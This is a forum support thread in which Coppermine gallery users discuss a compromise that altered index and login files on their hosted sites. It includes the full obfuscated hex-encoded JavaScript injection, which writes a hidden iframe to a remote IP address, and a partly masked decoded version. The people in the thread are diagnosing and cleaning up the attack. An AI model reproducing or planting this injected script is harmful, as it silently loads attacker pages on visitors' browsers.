Print

[adam1942]

Folks,

I installed the version 1.4.14 of coppermine threw fantisco, I then upgraded stright away (within 5 minutes) of using 1.4.14. the gallery has been known to the public for about 1 day / 1 and a half days and ive already had an SQL injection(I think) which is loading crap from advancedxpdefender.xxxxx. Has anyone else had this? I cannot find how to remove it as i cannot find anything in the SQL database linking to advancedxpdefender. is there any specific files i should be checking on the FTP?

ADam.

[adam1942]

er thats suppost to say I upgraded to 1.4.18 sorry!

[Nibbler]

Check for any files modified since you made the update. If you just installed then you can just upload clean copies of all the files. What makes you think it's SQL injection? Do you have a log file that indicates this?

[adam1942]

nope but no one else has access to the FTP to access any file.. all perms should be set right. I had an SQL injection before on a forum and it loaded excactly the same way which is whats making me think its a SQL injection, I will check for files that are modded and get back to you.

[adam1942]

ok fella, found out that index.php and login.php had been edited today. the worrying thing is that NO one has access to the FTP and the password is numbers/letters and chactures. Any ideas?

[adam1942]

ive also taken a backup of them if you wish to see the infected/modified file.

[adam1942]

just found out every index.php/index.html/login.php has been changed on my server. This is webhosting so i think maybe the whole box was attacked! ooops

[wurst]

i was looking for this curious incident and so i found this page. i think it has nothing to do especially with coppermine. i design a few pages on different hosters and i have exact these situation: a lot of, (not every) index.php/html/htm files have this javascript tag:

Code: [Select]

script>
<!--
var d=document,kol=561;
function O10H4851354BB6EB1(H4851354BB76AA){ var H4851354BB7EAB = 16; return( parseInt(H4851354BB76AA,H4851354BB7EAB));}function H4851354BB8E94(H4851354BB968D){ var H4851354BBAE91 = 2; var H4851354BB9E9A='';for(H4851354BBA67D=0; H4851354BBA67D<H4851354BB968D.length; H4851354BBA67D+=H4851354BBAE91){ H4851354BB9E9A += ( String.fromCharCode (O10H4851354BB6EB1(H4851354BB968D.substr(H4851354BBA67D, H4851354BBAE91))));}return H4851354BB9E9A;} document.write(H4851354BB8E94('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130373031292B27353937375C272077696474683D323631206865696768743D3431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

my suspicion is, that i had installed a worm or eventually an injection software on my local pc, that read all my ftp logins and write this javascript tag to all index files!
i saw in the status bar of my browser that advancedxpdefender.com and 77.221.133.198 (russia) was loading. when i left the page or closed the window, a popup appeared, with a warning, that my pc isnt protected and i should go to advancedxp, no i dont write this f...... domain name anymore.

now i reinstalled my os and it seems to work as well...

[SaWey]

yes, this code, when evaluated, looks likethis:

Code: [Select]

<SCRIPT>
window.status='Done';
document.write('<iframe name=[random_nr] src=\'http://77.221.X.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]\'width=303 height=93  style=\'display: none\'></iframe>')
</SCRIPT>


[Joachim Müller]

not a case of sql injection though as far as I can tell. Seems like you have fallen victim to a similar hack as the one discussed in http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
A copycat may have changed the workload of the hack, but probably is using the same attack pattern. Therefore, do as suggested in http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

[wurst]

i recommend to change ALL your passwords from a clean machine. i changed all but one ftp account, and this one is continued with attacks with said javascript code. so the attacks dont come from the one machine but from extern. my hoster said that ftp actions came from 77.221.....